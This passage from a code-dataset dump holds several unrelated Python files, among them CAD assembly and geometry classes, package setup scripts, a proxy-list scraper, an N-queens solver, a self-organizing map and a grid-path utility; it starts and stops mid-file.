child):\n\t\tchild.parent = self\n\t\tself.childs.add(child)\n\n\tdef link(self, child):\n\t\tself.add_child(child)\n\n\tdef location_update(self, deep=True, view=True):\n\t\tif self.parent is None:\n\t\t\tself.global_location = self.location\n\n\t\telse:\n\t\t\tself.global_location = self.parent.global_location * self.location\n\n\t\tif deep:\n\t\t\tfor c in self.childs:\n\t\t\t\tc.location_update(deep=True, view=view)\n\n\t\tif view:\n\t\t\tself._apply_view_location(False)\n\n\tdef relocate(self, location, deep=False, view=True):\n\t\tself.location = evalcache.unlazy_if_need(location)\n\t\tself.location_update(deep=deep, view=False)\n\n\t\tif view:\n\t\t\tself._apply_view_location(deep=deep)\n\n\tdef set_objects(self, objects):\n\t\tself.dispobjects = objects\n\n\tdef add_object(self, d):\n\t\tself.dispobjects.append(d)\n\n\tdef add_shape(self, shp, color=zencad.settings.Settings.get_default_color()):\n\t\tshp = evalcache.unlazy_if_need(shp)\n\t\tcontroller = pyservoce.interactive_object(shp)\n\t\tcontroller.set_color(pyservoce.color(color))\n\t\tself.dispobjects.append(controller)\n\t\tself.shapes_holder.append(shp)\n\t\treturn controller\n\n\tdef add_triedron(self, length=10, width=1, arrlen=1,\n\t\t\txcolor=pyservoce.red, ycolor=pyservoce.green, zcolor=pyservoce.blue):\n\t\tself.xaxis = pyservoce.draw_arrow(pyservoce.point3(0,0,0), pyservoce.vector3(length,0,0), clr=xcolor, arrlen=arrlen, width=width)\n\t\tself.yaxis = pyservoce.draw_arrow(pyservoce.point3(0,0,0), pyservoce.vector3(0,length,0), clr=ycolor, arrlen=arrlen, width=width)\n\t\tself.zaxis = pyservoce.draw_arrow(pyservoce.point3(0,0,0), pyservoce.vector3(0,0,length), clr=zcolor, arrlen=arrlen, width=width)\n\n\t\tself.dispobjects.append(self.xaxis)\n\t\tself.dispobjects.append(self.yaxis)\n\t\tself.dispobjects.append(self.zaxis)\n\n\tdef set_shape(self, shape):\n\t\tself.shape = shape\n\n\tdef set_color(self, *args, **kwargs):\n\t\tself.color = pyservoce.color(*args, **kwargs)\n\n\tdef print_tree(self, tr=0):\n\t\ts = \"\\t\" * tr + str(self) \n\t\tprint(s)\n\t\t\n\t\tfor c in self.childs:\n\t\t\tc.print_tree(tr+1)\n\n\tdef __str__(self):\n\t\tif self.name:\n\t\t\tn = self.name\n\t\telse:\n\t\t\tn = repr(self)\n\n\t\tif self.shape is None:\n\t\t\th = \"NullShape\"\n\t\telse:\n\t\t\th = self.shape.__lazyhexhash__[0:10]\n\n\t\treturn str((n,h))\n\n\tdef _apply_view_location(self, deep):\n\t\t\"\"\"Перерисовать положения объектов юнита во всех зарегестрированных \n\t\tview. Если deep, применить рекурсивно.\"\"\"\n\n\t\tfor v in self.views:\n\t\t\tv.set_location(self.global_location)\n\n\t\tif deep:\n\t\t\tfor c in self.childs:\n\t\t\t\tc._apply_view_location(deep)\n\t\t\n\tdef bind_scene(self, \n\t\t\t\tscene, \n\t\t\t\tcolor=zencad.settings.Settings.get_default_color(), \n\t\t\t\tdeep=True):\n\t\tself.location_update(deep)\n\n\t\tfor d in self.dispobjects:\n\t\t\tscene.viewer.display(d)\n\t\t\tself.views.add(ShapeView(d))\n\n\t\tif self.shape is not None:\n\t\t\tif self.color is not None:\n\t\t\t\tcolor = self.color\n\t\n\t\t\tshape_view = ShapeView(scene.add(\n\t\t\t\tevalcache.unlazy_if_need(self.shape), \n\t\t\t\tcolor))\n\t\t\tscene.viewer.display(shape_view.sctrl)\n\t\t\tself.views.add(shape_view)\n\n\t\tself._apply_view_location(deep=False)\n\n\t\tif deep:\n\t\t\tfor c in self.childs:\n\t\t\t\tc.bind_scene(scene, color=color, deep=True)\n\n","sub_path":"zencad/assemble.py","file_name":"assemble.py","file_ext":"py","file_size_in_byte":4234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"585333210","text":"__author__ = 'mikhail91'\n\nfrom setuptools import setup, find_packages\n\nsetup(\n name='datapopclient',\n version='0.1.0',\n url='https://github.com/hushchyn-mikhail/DataPopularity',\n author='Mikhail Hushchyn',\n author_email='mikhail91@yandex-team.ru',\n packages=find_packages(),\n description='',\n include_package_data=True,\n py_modules = ['datapopclient'],\n install_requires=[\n 'numpy >= 1.9.2',\n 'pandas >= 0.14.0',\n 'requests >= 2.5.3',\n ],\n)\n","sub_path":"datapopclient/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"260090519","text":"import re\nimport gzip\nimport sys\nimport urllib.error\nimport urllib.request\nimport header\n\n\n#url=${url}\nreq=urllib.request.Request(url, headers=header.header())\nhander_cookie=urllib.request.HTTPCookieProcessor()\nbuild_cookie=urllib.request.build_opener(hander_cookie)\nurllib.request.install_opener(build_cookie)\n\ntry:\n\tresp=urllib.request.urlopen(req)\nexcept urllib.error.HTTPError as e:\n\tprint('urllib.error.HTTPError:',e)\n\tsys.exit()\n\ngzip_rbuf = gzip.decompress(resp.read())\nhtml = gzip_rbuf.decode()\nif not html:\n\tsys.exit()\n\n#proxys = re.findall(${pattern}, html, re.S)\n\nwith open('proxy', 'w') as f:\n\tfor ip, port in proxys:\n\t\tf.write(ip+':'+port+'@\\n')\n","sub_path":"2017-3/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"493922412","text":"import time\nvisit_state = 0\n\ndef FCcheck(index,value,cur_un_assigned,cur_domain):\n\n for x in cur_un_assigned:\n new_domain = []\n for y in cur_domain[x]:\n if y == value or (abs(x - index) == abs(y - value)):\n continue\n else:\n new_domain.append(y)\n if len(new_domain) == 0:\n return \"DWO\"\n cur_domain[x] = new_domain\n return True\n\ndef FC(un_assigned,domain,solution,N,index):\n global visit_state\n visit_state += 1\n cur_un_assigned = un_assigned[:]\n cur_un_assigned.remove(index)\n for value in domain[index]:\n solution[index] = value\n if len(cur_un_assigned) <= 0:\n return True\n cur_domain = []\n for k in range(N):\n tmp = domain[k][:]\n cur_domain.append(tmp)\n if FCcheck(index,value,cur_un_assigned,cur_domain) == \"DWO\":\n continue\n min_index = cur_un_assigned[0] #存储当前取值最少的变量序号\n min_length = len(cur_domain[min_index]) #存储当前取值最少的个数\n #遍历,寻找取值最少的变量序号\n for k in range(1,len(cur_un_assigned)):\n #如果取值更少,则直接更新值域长度、变量序号\n if len(cur_domain[cur_un_assigned[k]]) < min_length:\n min_length = len(cur_domain[cur_un_assigned[k]])\n min_index = cur_un_assigned[k]\n #将取值最少的变量序号作为参数传递\n result = FC(cur_un_assigned,cur_domain,solution,N,min_index)\n if result != False:\n return result\n\n return False\n\n\ndef start_FC(N):\n\n domain = []\n for i in range(N):\n domain.append([x for x in range(N)])\n\n un_assigned = [x for x in range(N)]\n solution = [0]*N\n\n result = FC(un_assigned,domain,solution,N,0)\n\n if result == True:\n return solution\n return False\n\ndef main():\n N = int(input('Please input N = '))\n start = time.clock()\n solution = start_FC(N)\n\n if solution == False:\n print(\"No solution\")\n else:\n for i in range(N):\n print('(', i, \",\", solution[i], ')', end='')\n print()\n\n end = time.clock()\n print(\"Forwardchecking run time : \",float(end - start),' s')\n print(\"visited state number: \",visit_state)\n\n queen_map = []\n for i in range(N):\n tmp = ['.'] * N\n queen_map.append(tmp)\n for i in range(len(solution)):\n queen_map[i][solution[i]] = 'X'\n\n for i in range(N):\n print(' ', ''.join(queen_map[i]))\n\n\nif __name__ == '__main__':\n main()","sub_path":"FC_optimization_MRV.py","file_name":"FC_optimization_MRV.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"404504278","text":"class CinemaHall:\n \"\"\" Кинозал \"\"\"\n def __init__(self, name, movie, rows=10, colomns=10):\n self.rows = rows\n self.colomns = colomns\n self.chairs = [[None for _ in range(colomns)] for _ in range(rows)]\n\n # имя заля\n self.name = name\n # кино, там показываемое\n self.movie = movie\n\n def __len__(self):\n return self.rows * self.colomns\n\n def __str__(self):\n res = \"\"\n res += f\"Кинозал '{self.name.capitalize()}'\" \\\n f\"\\nСейчас в прокате: {self.movie}\" \\\n f\"\\nВсего мест: {len(self)}\" \\\n f\"\\nЗанято: {self.count_taken()}\" \\\n f\"\\nМаксимально свободных мест рядом: {self.max_free_slice()}\\n\"\n\n for i in enumerate(self.chairs, 1):\n res += f\"{i[0]} ряд: \" + ' '.join('[0]' if j is None else '[P]' for j in i[1]) + '\\n'\n\n return res\n\n def is_correct(self, row=None, colomns=None):\n \"\"\" Должны быть переданы уже декриминированные значения переменных \"\"\"\n if row is not None:\n return not self.rows <= row <= 0\n if colomns is not None:\n return not self.colomns <= colomns <= 0\n raise ValueError(f\"Wrong input!\")\n\n def is_free(self, row_index, place_index):\n \"\"\" Свободно ли место\"\"\"\n if self.is_correct(row=row_index) and self.is_correct(colomns=place_index):\n return self.chairs[row_index][place_index] is None\n raise ValueError(\"Wrong numbers!\")\n\n def place(self, row, place):\n \"\"\"\" Поместить человека на место \"\"\"\n if not self.is_free(row, place):\n raise Exception(\"This place is occupied yet!\")\n self.chairs[row][place] = 1\n\n def count_taken(self):\n \"\"\" Возвращает количество занятых мест \"\"\"\n res = 0\n for i in self.chairs:\n res += len(list(filter(lambda x: x is not None, i)))\n return res\n\n def max_free_slice(self):\n \"\"\" Максимальное количество свободных мест рядом \"\"\"\n maxx = 0\n for i in self.chairs:\n tmp = 0\n for j in i:\n if j is None:\n tmp += 1\n else:\n if tmp > maxx:\n maxx = tmp\n tmp = 0\n if tmp > maxx:\n maxx = tmp\n return maxx\n\n def get_movie(self):\n return self.movie\n\n def __hash__(self):\n return hash(self.movie + self.name + f'{len(self)}')\n\n\nclass Cinema:\n def __init__(self, name, holles):\n self.name = name\n self.holles = holles\n\n def search_for_movie(self, ff):\n res = []\n print(*self.holles[0])\n for i in self.holles:\n if i.get_movie() == ff:\n print(i)\n #where = list(filter(lambda x: x.movie == ff, self.holles))\n #print(*where)\n\n\n\n\nif __name__== \"__main__\":\n a = CinemaHall(\"XxxXX\", \"Шляпа какая-то, режиссёр Ясос Биб\", 10, 10)\n\n b = Cinema(\"Convremennic\", [CinemaHall])\n print(b.search_for_movie(\"Шляпа какая-то, режиссёр Ясос Биб\"))\n try:\n for i in range(10):\n a.place(i, 1)\n for i in range(10):\n a.place(i, 1)\n except Exception as exp:\n print(exp)\n print(a)\n","sub_path":"Первое полугодие/Lesson 3 (Повторение. Проектирование классов)/Classwork/3. Кинотеатры.py","file_name":"3. Кинотеатры.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"302727396","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport json\n\n\ndef load_song_embedding(filename):\n\n row_idx = 0\n song_embedding = [[0 for _ in range(137)]]\n song_idx = {0: 0}\n tag_idx = {0: 0}\n lan_idx = {0: 0}\n cn_tag_idx = {0: 0}\n\n with open(filename, 'r') as fid:\n while True:\n row_idx += 1\n line = fid.readline()\n\n if line.strip() == \"\":\n break\n\n sid, info, tag, lan, cn_tag = line.split(\"\\t\")\n info = info.split(\",\")\n\n tag = int(tag)\n lan = int(lan)\n cn_tag = int(cn_tag)\n embedding = list(map(float, info))\n\n song_embedding.append(embedding)\n\n if sid not in song_idx:\n song_idx[sid] = row_idx\n\n if sid not in tag_idx:\n tag_idx[sid] = tag\n\n if sid not in lan_idx:\n lan_idx[sid] = lan\n\n if sid not in cn_tag_idx:\n cn_tag_idx[sid] = cn_tag\n\n song_embedding = np.array(song_embedding)\n print(song_embedding.shape)\n json.dump(song_idx, open(\"../data/song_idx.json\", 'w+'))\n json.dump(tag_idx, open(\"../data/tag_idx.json\", \"w+\"))\n json.dump(lan_idx, open(\"../data/lan_idx.json\", \"w+\"))\n json.dump(cn_tag_idx, open(\"../data/cn_tag_idx.json\", \"w+\"))\n\n np.save(\"../data/song\", song_embedding)\n\n\nif __name__ == \"__main__\":\n load_song_embedding(\"../data/song.embedding\")\n","sub_path":"netease_workCode/mlServer/music_din/src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"32883165","text":"from matplotlib import pyplot as plt\nimport numpy as np\nimport random\nfrom dataset import dataset\n\ndef distance(v1, v2):\n \"\"\"\n ベクトル距離計算\n \"\"\"\n dist = 0\n for i in range(len(v1)):\n dist += (v1[i]-v2[i])**2\n return dist**0.5\n\ndef distance_with_np(v1, v2):\n \"\"\"\n ベクトル距離計算\n \"\"\"\n dist = sum((v1-v2)**2)\n return dist**0.5\n\ndef near(map_vector, input_vector):\n \"\"\"\n 近傍点探索\n \"\"\"\n dist_vector = [distance_with_np(input_vector, m) for m in map_vector]\n return dist_vector.index(min(dist_vector))\n\ndef nearest_shape(vec, ans_vec):\n \"\"\"\n ans_vecの中から、vecに最も近いベクトルを探索する。\n \"\"\"\n dist_vector = [distance_with_np(vec, m) for m in ans_vec]\n return dist_vector.index(min(dist_vector))\n\nclass Som():\n \"\"\"\n vec_size : 入力ベクトルサイズ\n ans_vec : 答えとなるベクトル\n width : マップの横サイズ\n height : マップの縦サイズ\n iter : イテレーション回数\n learning_rate : 学習率\n \"\"\"\n\n def __init__(self,vec_size,ans_vec,width=20,height=20,iter=50,learning_rate=0.5,area_size=3):\n self.vec_size = vec_size\n self.width = width\n self.height = height\n self.map_vector = [np.array([random.random() for _ in range(vec_size)]) for _ in range(height) for _ in range(width)]\n self.iter = iter\n self.learning_rate = learning_rate\n self.area_size = area_size\n self.ans_vec = ans_vec\n\n def fit(self,X):\n a = 1.0\n a_size = self.area_size\n for iter in range(self.iter):\n for vec in X:\n bmu = near(self.map_vector, vec)\n\n for i in range(self.width * self.height):\n c = (a_size - distance([i // self.width, i % self.width], [bmu //self.width, bmu%self.width]))\n if c > 0:\n self.map_vector[i] = [mv+c*a*(iv-mv) for iv, mv in zip(vec, self.map_vector[i])]\n\n a = (self.iter - iter) / self.iter\n a_size = self.area_size * (self.iter - iter) / self.iter\n return self\n\n def _make_map(self):\n nearest_map = []\n for vec in self.map_vector:\n nearest_map.append(nearest_shape(vec, self.ans_vec))\n return nearest_map\n\n def show(self):\n som_map = self._make_map()\n for h in range(self.height):\n for w in range(self.width):\n print(som_map[h*self.height+w], end=' ')\n print()\n\n\n\nif __name__ == \"__main__\":\n data, label, ans_vec = dataset()\n som = Som(vec_size=784, ans_vec=ans_vec)\n som.fit(data)\n som.show()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"5472389","text":"import sys\nimport Box2D\nsys.path.append(\"..\")\nimport random\nfrom Referee.ICRAMap import BORDER_POS, BORDER_BOX\nfrom Objects.Robot import ROBOT_SIZE,SIZE\n\nBORDER_POS = [(-0.1, 2.5), (4, -0.1), (4, 5.1), (8.1, 2.5), (1.525, 1.9), (3.375, 0.5), (6.475, 3.1), (4.625, 4.5),\n (1.7, 3.875), (4, 2.5), (6.3, 1.125)]\nBORDER_BOX = [(0.1, 2.5), (4, 0.1), (4, 0.1), (0.1, 2.5), (0.125, 0.5), (0.125, 0.5), (0.125, 0.5), (0.125, 0.5),\n (0.5, 0.125), (0.5, 0.125), (0.5, 0.125)] # Half of the weight and height\n\nMAXSCALE = 20\n\nBIAS = 0.5\nBODYSIZE = SIZE*ROBOT_SIZE*1.4\n\nclass Cell(object):\n\n def __init__(self, char):\n self.char = char\n self.tag = 0\n self.index = 0\n self.neighbors = None\n\n\nclass Grid(object):\n\n def __init__(self, cells):\n self.height, self.width = len(cells), len(cells[0])\n self.cells = cells\n\n def __contains__(self, pos):\n y, x = pos\n return 0 <= y < self.height and 0 <= x < self.width\n\n def __getitem__(self, pos):\n y, x = pos\n return self.cells[y][x]\n\n def neighbors(self, y, x):\n for dy, dx in ((-1, -1), (-1, 0), (-1, 1), (0, -1), (0, 1), (1, -1),\n (1, 0), (1, 1)):\n if (y + dy, x + dx) in self:\n yield y + dy, x + dx\n\n\ndef map2grid(width, height):\n str = ''\n\n for i in range(height):\n str += '\\n'\n for j in range(width):\n str += ' '\n\n for k in range(BORDER_POS.__len__()):\n hidx = (int(MAXSCALE * BIAS + MAXSCALE * BORDER_POS[k][1] - MAXSCALE * BORDER_BOX[k][1] - MAXSCALE * BODYSIZE),\n int(MAXSCALE * BIAS + MAXSCALE * BORDER_POS[k][1] + MAXSCALE * BORDER_BOX[k][1] + MAXSCALE * BODYSIZE))\n widx = (int(MAXSCALE * BIAS + MAXSCALE * BORDER_POS[k][0] - MAXSCALE * BORDER_BOX[k][0] - MAXSCALE * BODYSIZE),\n int(MAXSCALE * BIAS + MAXSCALE * BORDER_POS[k][0] + MAXSCALE * BORDER_BOX[k][0] + MAXSCALE * BODYSIZE))\n for i in range(hidx[0], hidx[1]):\n for j in range(max(widx[0], 1), widx[1]):\n mylen = i * (width + 1) + j\n str = str[:mylen] + '#' + str[mylen + 1:]\n\n return str\n\n\ndef parse_grid(grid_str, width, height):\n # Split the grid string into lines.\n lines = [line.rstrip() for line in grid_str.splitlines()[1:]]\n\n # Pad the top and bottom.\n top = 0#(height - len(lines)) // 2\n bottom =height #(height - len(lines) + 1) // 2\n lines = ([''] * top + lines + [''] * bottom)[:height]\n\n # Pad the left and right sides.\n max_len = max(len(line) for line in lines)\n left = 0#(width - max_len) // 2\n lines = [' ' * left + line.ljust(width - left)[:width - left]\n for line in lines]\n\n # Create the grid.\n cells = [[Cell(char) for char in line] for line in lines]\n return Grid(cells)\n\ndef view_grid(grid):\n # Update the grid view.\n str = ''\n for y, line in enumerate(grid.cells):\n for x, cell in enumerate(line):\n char = cell.char\n if (char == '#'):\n str += '#'\n else:\n str += ' '\n str += '\\n'\n return str\n\n\ndef view_path(str, path, width):\n for i in range(path.__len__()):\n mylen = path[i][0] * (width + 1) + path[i][1] + 1\n str = str[:mylen] + ':' + str[mylen + 1:]\n\n return str\n\nBIASX = 3\nBIASY = 0\ndef grid2world(path):\n cood = Box2D.b2Vec2((float(path[1] + BIASX)) / MAXSCALE - BIAS,\n (float(path[0]) + BIASY) / MAXSCALE - BIAS)\n return cood\n\n\ndef world2grid(cood):\n path = (int(MAXSCALE * BIAS + MAXSCALE * cood.y) - BIASY,\n int(MAXSCALE * BIAS + MAXSCALE * cood.x) - BIASX)\n\n return path\n\n\nif __name__ == '__main__':\n import random\n\n width = 500\n height = 116\n str = map2grid(width, height)\n print(str)\n mylen = str.__len__()\n grid = parse_grid(str, width, height)\n str=view_grid(grid)\n print(str)\n","sub_path":"util/Grid.py","file_name":"Grid.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"463258521","text":"import os\nimport io\nfrom setuptools import setup, find_packages\nfrom subprocess import check_output\nfrom setuptools.dist import Distribution\nfrom platform import system\n\ndata_files = []\nfor path, dirnames, filenames in os.walk('python'):\n for filename in filenames:\n data_files.append(os.path.join(path, filename))\n\n# Use libpath.py to locate libdlr.so\nLIBPATH_PY = os.path.abspath('./dlr/libpath.py')\nLIBPATH = {'__file__': LIBPATH_PY}\nexec(compile(open(LIBPATH_PY, \"rb\").read(), LIBPATH_PY, 'exec'),\n LIBPATH, LIBPATH)\n\nCURRENT_DIR = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))\nLIB_PATH = [os.path.relpath(LIBPATH['find_lib_path'](setup=True), CURRENT_DIR)]\n\nif not LIB_PATH:\n raise RuntimeError('libdlr.so missing. Please compile first using CMake')\n\n# fetch meta data\nMETADATA_PY = os.path.abspath(\"./dlr/metadata.py\")\nMETADATA_PATH = {\"__file__\": METADATA_PY}\nMETADATA_BIN = open(METADATA_PY, \"rb\")\nexec(compile(METADATA_BIN.read(), METADATA_PY, 'exec'), METADATA_PATH, METADATA_PATH)\nMETADATA_BIN.close()\n\nsetup(\n name=\"dlr\",\n version=METADATA_PATH['VERSION'],\n\n zip_safe=False,\n install_requires=['numpy', 'requests', \"distro\"],\n\n # declare your packages\n packages=find_packages(),\n\n # include data files\n include_package_data=True,\n data_files=[('dlr', LIB_PATH)],\n\n description = 'Common runtime for machine learning models compiled by \\\n AWS SageMaker Neo, TVM, or TreeLite.',\n long_description=io.open(os.path.join(CURRENT_DIR, '../README.md'), encoding='utf-8').read(),\n long_description_content_type=\"text/markdown\",\n author = 'AWS Neo',\n author_email = 'aws-neo-ai@amazon.com',\n url='https://github.com/neo-ai/neo-ai-dlr',\n license = \"Apache-2.0\",\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Topic :: Utilities\",\n \"License :: OSI Approved :: Apache Software License\",\n ],\n)\n","sub_path":"python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"115377144","text":"\nimport json\nimport numbers\nimport warnings\nfrom collections.abc import Iterable\nfrom pathlib import Path\nfrom typing import List, Tuple, Optional, Union\n\nimport cadquery as cq\nimport matplotlib.pyplot as plt\nfrom cadquery import exporters\nfrom matplotlib.collections import PatchCollection\nfrom matplotlib.patches import Polygon\n\nimport paramak\nfrom paramak.neutronics_utils import (add_stl_to_moab_core,\n define_moab_core_and_tags)\nfrom paramak.utils import (_replace, cut_solid, facet_wire, get_hash,\n intersect_solid, plotly_trace, union_solid)\n\n\nclass Shape:\n \"\"\"A shape object that represents a 3d volume and can have materials and\n neutronics tallies assigned. Shape objects are not intended to be used\n directly by the user but provide basic functionality for user-facing\n classes that inherit from Shape.\n\n Args:\n points (list of (float, float, float), optional): the x, y, z\n coordinates of points that make up the shape. Defaults to None.\n connection_type (str, optional): The type of connection between points.\n Possible values are \"straight\", \"circle\", \"spline\", \"mixed\".\n Defaults to \"mixed\".\n name (str, optional): the name of the shape, used in the graph legend\n by export_html. Defaults to None.\n color ((float, float, float [, float]), optional): The color to use\n when exporting as html graphs or png images. Can be in RGB or RGBA\n format with floats between 0 and 1. Defaults to (0.5, 0.5, 0.5).\n material_tag (str, optional): the material name to use when exporting\n the neutronics description. Defaults to None.\n stp_filename (str, optional): the filename used when saving stp files.\n Defaults to None.\n stl_filename (str, optional): the filename used when saving stl files.\n Defaults to None.\n azimuth_placement_angle (iterable of floats or float, optional): the\n azimuth angle(s) used when positioning the shape. If a list of\n angles is provided, the shape is duplicated at all angles.\n Defaults to 0.0.\n workplane (str, optional): the orientation of the Cadquery workplane.\n (XY, YZ or XZ). Defaults to \"XZ\".\n rotation_axis (str or list, optional): rotation axis around which the\n solid is rotated. If None, the rotation axis will depend on the\n workplane or path_workplane if applicable. Can be set to \"X\", \"-Y\",\n \"Z\", etc. A custom axis can be set by setting a list of two XYZ\n floats. Defaults to None.\n tet_mesh (str, optional): If not None, a tet mesh flag will be added to\n the neutronics description output. Defaults to None.\n surface_reflectivity (Boolean, optional): If True, a\n surface_reflectivity flag will be added to the neutronics\n description output. Defaults to None.\n physical_groups (dict, optional): contains information on physical\n groups (volumes and surfaces). Defaults to None.\n cut (paramak.shape or list, optional): If set, the current solid will\n be cut with the provided solid or iterable in cut. Defaults to\n None.\n intersect (paramak.shape or list, optional): If set, the current solid\n will be interested with the provided solid or iterable of solids.\n Defaults to None.\n union (paramak.shape or list, optional): If set, the current solid\n will be united with the provided solid or iterable of solids.\n Defaults to None.\n \"\"\"\n\n def __init__(\n self,\n points: list = None,\n connection_type: Optional[str] = \"mixed\",\n name: Optional[str] = None,\n color: Optional[Tuple[float, float, float]] = (0.5, 0.5, 0.5),\n material_tag: Optional[str] = None,\n stp_filename: Optional[str] = None,\n stl_filename: Optional[str] = None,\n azimuth_placement_angle: Optional[Union[float, List[float]]] = 0.0,\n workplane: Optional[str] = \"XZ\",\n rotation_axis: Optional[str] = None,\n tet_mesh: Optional[str] = None,\n surface_reflectivity: Optional[bool] = False,\n physical_groups=None,\n # TODO defining Shape types as paramak.Shape results in circular import\n cut=None,\n intersect=None,\n union=None,\n ):\n\n self.connection_type = connection_type\n self.points = points\n self.stp_filename = stp_filename\n self.stl_filename = stl_filename\n self.color = color\n self.name = name\n\n self.cut = cut\n self.intersect = intersect\n self.union = union\n\n self.azimuth_placement_angle = azimuth_placement_angle\n self.workplane = workplane\n self.rotation_axis = rotation_axis\n\n # neutronics specific properties\n self.material_tag = material_tag\n self.tet_mesh = tet_mesh\n self.surface_reflectivity = surface_reflectivity\n\n self.physical_groups = physical_groups\n\n # properties calculated internally by the class\n self.solid = None\n self.wire = None\n self.render_mesh = None\n # self.volume = None\n self.hash_value = None\n self.points_hash_value = None\n self.x_min = None\n self.x_max = None\n self.z_min = None\n self.z_max = None\n self.graveyard_offset = None # set by the make_graveyard method\n self.patch = None\n\n @property\n def solid(self):\n \"\"\"The CadQuery solid of the 3d object. Returns a CadQuery workplane\n or CadQuery Compound\"\"\"\n\n ignored_keys = [\"_solid\", \"_hash_value\"]\n if get_hash(self, ignored_keys) != self.hash_value:\n self.create_solid()\n self.hash_value = get_hash(self, ignored_keys)\n\n return self._solid\n\n @solid.setter\n def solid(self, value):\n self._solid = value\n\n @property\n def wire(self):\n \"\"\"The CadQuery wire of the 3d object. Returns a CadQuery workplane\n or CadQuery Compound\"\"\"\n\n ignored_keys = [\"_wire\", \"_solid\", \"_hash_value\"]\n if get_hash(self, ignored_keys) != self.hash_value:\n self.create_solid()\n self.hash_value = get_hash(self, ignored_keys)\n\n return self._wire\n\n @wire.setter\n def wire(self, value):\n self._wire = value\n\n @property\n def cut(self):\n return self._cut\n\n @cut.setter\n def cut(self, value):\n self._cut = value\n\n @property\n def intersect(self):\n return self._intersect\n\n @intersect.setter\n def intersect(self, value):\n self._intersect = value\n\n @property\n def union(self):\n return self._union\n\n @union.setter\n def union(self, value):\n self._union = value\n\n @property\n def largest_dimension(self):\n \"\"\"Calculates a bounding box for the Shape and returns the largest\n absolute value of the largest dimension of the bounding box\"\"\"\n largest_dimension = 0\n if isinstance(self.solid, (cq.Compound, cq.occ_impl.shapes.Solid)):\n for solid in self.solid.Solids():\n largest_dimension = max(\n abs(self.solid.BoundingBox().xmax),\n abs(self.solid.BoundingBox().xmin),\n abs(self.solid.BoundingBox().ymax),\n abs(self.solid.BoundingBox().ymin),\n abs(self.solid.BoundingBox().zmax),\n abs(self.solid.BoundingBox().zmin),\n largest_dimension\n )\n else:\n largest_dimension = max(\n abs(self.solid.val().BoundingBox().xmax),\n abs(self.solid.val().BoundingBox().xmin),\n abs(self.solid.val().BoundingBox().ymax),\n abs(self.solid.val().BoundingBox().ymin),\n abs(self.solid.val().BoundingBox().zmax),\n abs(self.solid.val().BoundingBox().zmin),\n largest_dimension\n )\n self.largest_dimension = largest_dimension\n return largest_dimension\n\n @largest_dimension.setter\n def largest_dimension(self, value):\n self._largest_dimension = value\n\n @property\n def workplane(self):\n return self._workplane\n\n @workplane.setter\n def workplane(self, value):\n acceptable_values = [\"XY\", \"YZ\", \"XZ\", \"YX\", \"ZY\", \"ZX\"]\n if value in acceptable_values:\n self._workplane = value\n else:\n raise ValueError(\n \"Shape.workplane must be one of \",\n acceptable_values,\n \" not \",\n value)\n\n @property\n def rotation_axis(self):\n return self._rotation_axis\n\n @rotation_axis.setter\n def rotation_axis(self, value):\n if isinstance(value, str):\n acceptable_values = \\\n [\"X\", \"Y\", \"Z\", \"-X\", \"-Y\", \"-Z\", \"+X\", \"+Y\", \"+Z\"]\n if value not in acceptable_values:\n msg = \"Shape.rotation_axis must be one of \" + \\\n \" \".join(acceptable_values) + \\\n \" not \" + value\n raise ValueError(msg)\n elif isinstance(value, Iterable):\n msg = \"Shape.rotation_axis must be a list of two (X, Y, Z) floats\"\n if len(value) != 2:\n raise ValueError(msg)\n for point in value:\n if not isinstance(point, tuple):\n raise ValueError(msg)\n if len(point) != 3:\n raise ValueError(msg)\n for val in point:\n if not isinstance(val, (int, float)):\n raise ValueError(msg)\n\n if value[0] == value[1]:\n msg = \"The two points must be different\"\n raise ValueError(msg)\n elif value is not None:\n msg = \"Shape.rotation_axis must be a list or a string or None\"\n raise ValueError(msg)\n self._rotation_axis = value\n\n @property\n def volume(self):\n \"\"\"Get the total volume of the Shape. Returns a float\"\"\"\n if isinstance(self.solid, cq.Compound):\n return self.solid.Volume()\n\n return self.solid.val().Volume()\n\n @property\n def volumes(self):\n \"\"\"Get the volumes of the Shape. Compound shapes provide a seperate\n volume value for each entry. Returns a list of floats\"\"\"\n all_volumes = []\n if isinstance(self.solid, cq.Compound):\n for solid in self.solid.Solids():\n all_volumes.append(solid.Volume())\n return all_volumes\n\n return [self.solid.val().Volume()]\n\n @property\n def area(self):\n \"\"\"Get the total surface area of the Shape. Returns a float\"\"\"\n if isinstance(self.solid, cq.Compound):\n return self.solid.Area()\n\n return self.solid.val().Area()\n\n @property\n def areas(self):\n \"\"\"Get the surface areas of the Shape. Compound shapes provide a\n seperate area value for each entry. Returns a list of floats\"\"\"\n all_areas = []\n if isinstance(self.solid, cq.Compound):\n for face in self.solid.Faces():\n all_areas.append(face.Area())\n return all_areas\n\n for face in self.solid.val().Faces():\n all_areas.append(face.Area())\n return all_areas\n\n @property\n def hash_value(self):\n return self._hash_value\n\n @hash_value.setter\n def hash_value(self, value):\n self._hash_value = value\n\n @property\n def points_hash_value(self):\n return self._points_hash_value\n\n @points_hash_value.setter\n def points_hash_value(self, value):\n self._points_hash_value = value\n\n @property\n def color(self):\n return 